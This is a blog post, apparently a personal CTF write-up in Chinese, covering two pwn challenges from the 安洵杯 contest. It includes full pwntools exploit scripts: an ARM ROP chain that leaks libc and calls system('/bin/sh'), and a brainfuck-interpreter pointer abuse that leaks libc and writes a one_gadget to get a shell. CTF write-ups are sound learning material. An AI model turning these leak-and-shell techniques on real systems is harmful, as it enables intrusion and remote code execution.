安洵杯WP

CTF-PWN
字数统计: 459   |   阅读时长≈ 2 分钟

太菜了,最后一个0解题不会,只会前两个被人打烂的。

  • babyarm

    Arm架构的栈溢出,先换表base64解密一下,可以解出来应该输入的字符串是s1mpl3Dec0d4r,然后就是32位的溢出,exp如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    from pwn import *

    #io = process("./chall")
    io = remote("47.108.29.107",10392)
    elf = ELF("./chall")
    libc = ELF("./libc-2.27.so")

    def input_pass():
        io.sendlineafter("msg> ","s1mpl3Dec0d4r")

    def overflow(payload):
        io.sendlineafter("comment> ",payload)

    read_got = elf.got["read"]
    puts_plt = elf.plt["puts"]
    #main_addr = elf.symbols["__libc_start_main"]
    main_addr = 0x1050C
    pop_r3_pc = 0x10464
    pop_r4_r5_r6_r7 = 0x10cb0
    mov_r0_r7 = 0x10ca0

    input_pass()

    payload = b'a'*(0x2c) + p32(pop_r4_r5_r6_r7) + p32(0xdeadbeef)*3 + p32(read_got) + p32(0xdeadbeef)*3 + p32(pop_r3_pc) + p32(puts_plt) + p32(mov_r0_r7) + p32(main_addr)*0x10

    overflow(payload)

    libc_base = u32(io.recv()[0:4])
    libc_base = libc_base - libc.symbols["read"]
    success("libc base is leaked ==> " + hex(libc_base))

    sys_addr = libc_base + libc.symbols["system"]
    bin_sh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))

    payload = b'a'*(0x2c) + p32(pop_r4_r5_r6_r7) + p32(0xdeadbeef)*3 + p32(bin_sh_addr) + p32(0xdeadbeef)*3 + p32(pop_r3_pc) + p32(sys_addr) + p32(mov_r0_r7) + p32(main_addr)*0x10

    input_pass()
    overflow(payload)

    io.interactive()

  • babybf

    brainfuck的解释器,brainfuck的操作格式为:

    操作码 含义
    > ptr +=1
    < ptr -= 1
    + (*ptr) += 1
    - (*ptr) -= 1
    . putchar(*ptr)
    , getchar(ptr)

    操作的是rbp-0xA8,那么先用>来加,然后putchar输出__libc_start_main+231的地址,然后再通过getchar读入one_gadget即可,exp如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    from pwn import *
    #io = process("./chall")
    io = remote("47.108.29.107",10392)

    elf = ELF("./chall")
    libc = ELF("./libc-2.27.so")

    context.arch = "amd64"
    context.log_level = "debug"

    def length(leng):
        io.sendafter("len> ",str(leng))

    def code(co):
        io.sendafter("code> ",co)

    add = 0x3e # >
    minus = 0x3c # <
    ptr_add = 0x2b # +
    ptr_minuns = 0x2d # -
    putchar = 0x2e # .
    getchar = 0x2c # ,
    nop = 0x0

    payload = p8(add)*0x58 + p8(putchar) + (p8(add) + p8(putchar))*7
    length(len(payload))
    code(payload)
    libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00')) - 231 - libc.symbols["__libc_start_main"]

    success("libc base is leaked ==>" + hex(libc_base))

    #ogg = libc_base + 0x4f2a5
    ogg = libc_base + 0x4f302

    payload=p8(add)*0x38 + p8(getchar) + (p8(add) + p8(getchar))*7 + p8(nop)

    gdb.attach(io)
    pause()

    length(len(payload))
    code(payload)

    io.send(p64(ogg))

    io.interactive()
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2023 h1J4cker
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~

支付宝
微信